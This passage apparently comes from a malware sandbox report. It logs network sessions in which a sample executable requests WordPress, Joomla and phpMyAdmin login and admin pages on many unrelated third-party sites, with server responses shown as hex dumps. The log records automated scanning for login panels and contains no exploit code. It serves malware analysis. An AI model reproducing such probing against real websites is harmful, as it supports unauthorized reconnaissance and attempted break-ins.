                                                                                                                                                                                                    2023-11-26 05:59:34 UTC347INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 61 64 6d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheExpires: Sun, 26 Nov 2023 06:59:34 GMTCache-Control: max-age=3600X-Redirect-By: WordPressUpgrade: h2Connection: Upgrade, closeLocation: https://capforge.com/adm


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    138192.168.2.45812523.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC231OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.avient.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC639INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 76 69 65 6e 74 2e 63 6f 6d 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 36 32 32 34 30 30 0d 0a 58 2d 50 61 6e 74 68 65 6f 6e 2d 53 74 79 78 2d 48 6f 73 74 6e 61 6d 65 3a 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeContent-Length: 0Content-Type: text/html; charset=UTF-8Location: https://www.avient.com/administrator/index.phpServer: nginxStrict-Transport-Security: max-age=31622400X-Pantheon-Styx-Hostname: s


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    139192.168.2.458082162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC230OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=25spuedk1v8jkqk9dcaj8tnufu
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC522INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 72 2d 63 66 2d 6c 69 73 74 5f 65 6d 61 69 6c 5f 73 65 6e 64 5f 74 6f 3d 64 65 6c 65 74 65 64 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wr-cf-list_email_send_to=deleted;
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC3247INData Raw: 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ca8<!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">...<![endif]--><head><meta http-equiv="Cont
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    140192.168.2.458189144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC1483INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 47 45 54 2c 50 4f 53 54 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2c 20 41
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Access-Control-Allow-Methods: GET,POSTAccess-Control-Allow-Headers: Content-Type, A
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC6709INData Raw: 33 39 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45
                                                                                                                                                                                                    Data Ascii: 391a<!DOCTYPE html><html lang="es-MX"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://gruporegiosafety.com/xmlrpc.php" /><script type="text/javascript">document.documentE
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC7915INData Raw: 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72
                                                                                                                                                                                                    Data Ascii: global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--pr
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC8192INData Raw: 31 66 34 30 0d 0a 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76
                                                                                                                                                                                                    Data Ascii: 1f40-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-viv
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC7822INData Raw: 65 66 74 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 61 66 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6c 65 66 74 3a 31 65 6d 7d 2e 65 74 5f 62 75 74 74 6f 6e 5f 69 63 6f 6e 5f 76 69 73 69 62 6c 65 2e 65 74 5f 62 75 74 74 6f 6e 5f 6c 65 66 74 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 2c 2e 65 74 5f 62 75 74 74 6f 6e 5f 6c 65 66 74 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 65 74 5f 62 75 74 74 6f 6e 5f 6c 65 66 74 20 2e 65 74 5f 70 62 5f 6d 6f 64 75 6c 65 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 37 65 6d 7d 2e 65 74 5f 62 75 74 74 6f 6e 5f 69 63 6f 6e 5f 76 69 73 69 62 6c 65 2e 65 74 5f 62 75 74 74 6f 6e
                                                                                                                                                                                                    Data Ascii: eft .et_pb_button:after{margin-left:0;left:1em}.et_button_icon_visible.et_button_left .et_pb_button,.et_button_left .et_pb_button:hover,.et_button_left .et_pb_module .et_pb_button:hover{padding-left:2em;padding-right:.7em}.et_button_icon_visible.et_button
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC8192INData Raw: 31 66 34 30 0d 0a 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 7d 23 65 74 2d 61 6a 61 78 2d 73 61 76 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 33 73 2c 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 33 73 2c 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 20 2e 33 73 2c 62 6f 78 2d 73 68 61 64 6f 77 20 2e 33 73 3b 74 72 61 6e 73 69 74
                                                                                                                                                                                                    Data Ascii: 1f40-webkit-box-sizing:border-box;box-sizing:border-box;direction:ltr}#et-ajax-saving{display:none;-webkit-transition:background .3s,-webkit-box-shadow .3s;transition:background .3s,-webkit-box-shadow .3s;transition:background .3s,box-shadow .3s;transit
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC7822INData Raw: 79 3a 30 7d 68 65 61 64 65 72 2e 65 74 2d 6c 2e 65 74 2d 6c 2d 2d 68 65 61 64 65 72 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 22 22 7d 2e 65 74 5f 70 62 5f 6d 6f 64 75 6c 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 6c 69 6e 65 61 72 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 2e 32 73 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 42 6f 74 74 6f 6d 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30
                                                                                                                                                                                                    Data Ascii: y:0}header.et-l.et-l--header:after{clear:both;display:block;content:""}.et_pb_module{-webkit-animation-timing-function:linear;animation-timing-function:linear;-webkit-animation-duration:.2s;animation-duration:.2s}@-webkit-keyframes fadeBottom{0%{opacity:0
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    141192.168.2.458106185.54.192.1254436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC279OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: talentius.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=k11oabf2270bqa8id9iv53haoo
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://talentius.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC392INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:34 GMTServer: Apache/2.4.52 (Ubuntu)Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressUpgrade: h2,h2c


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    142192.168.2.458092185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC307INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 58 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 58 2d 43
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=0Expires: Sun, 26 Nov 2023 05:59:34 GMTVary: Accept-EncodingX-Cache-Status: MISSX-C
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC634INData Raw: 32 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 73 63 72 69
                                                                                                                                                                                                    Data Ascii: 26e<!doctype html><html lang="en"><head><meta charset="utf-8"/><link rel="icon" href="/favicon.ico"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#000000"/><meta name="description" content="descri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    143192.168.2.45837666.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC309OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: _cfuvid=CCSTuNw27vjAGhe0LambVrEDd4CnmWBK1UKexrI2tUk-1700978372739-0-604800000
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://tradeavenida.com/wp-login.php
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC553INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: Wor
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    144192.168.2.458375104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
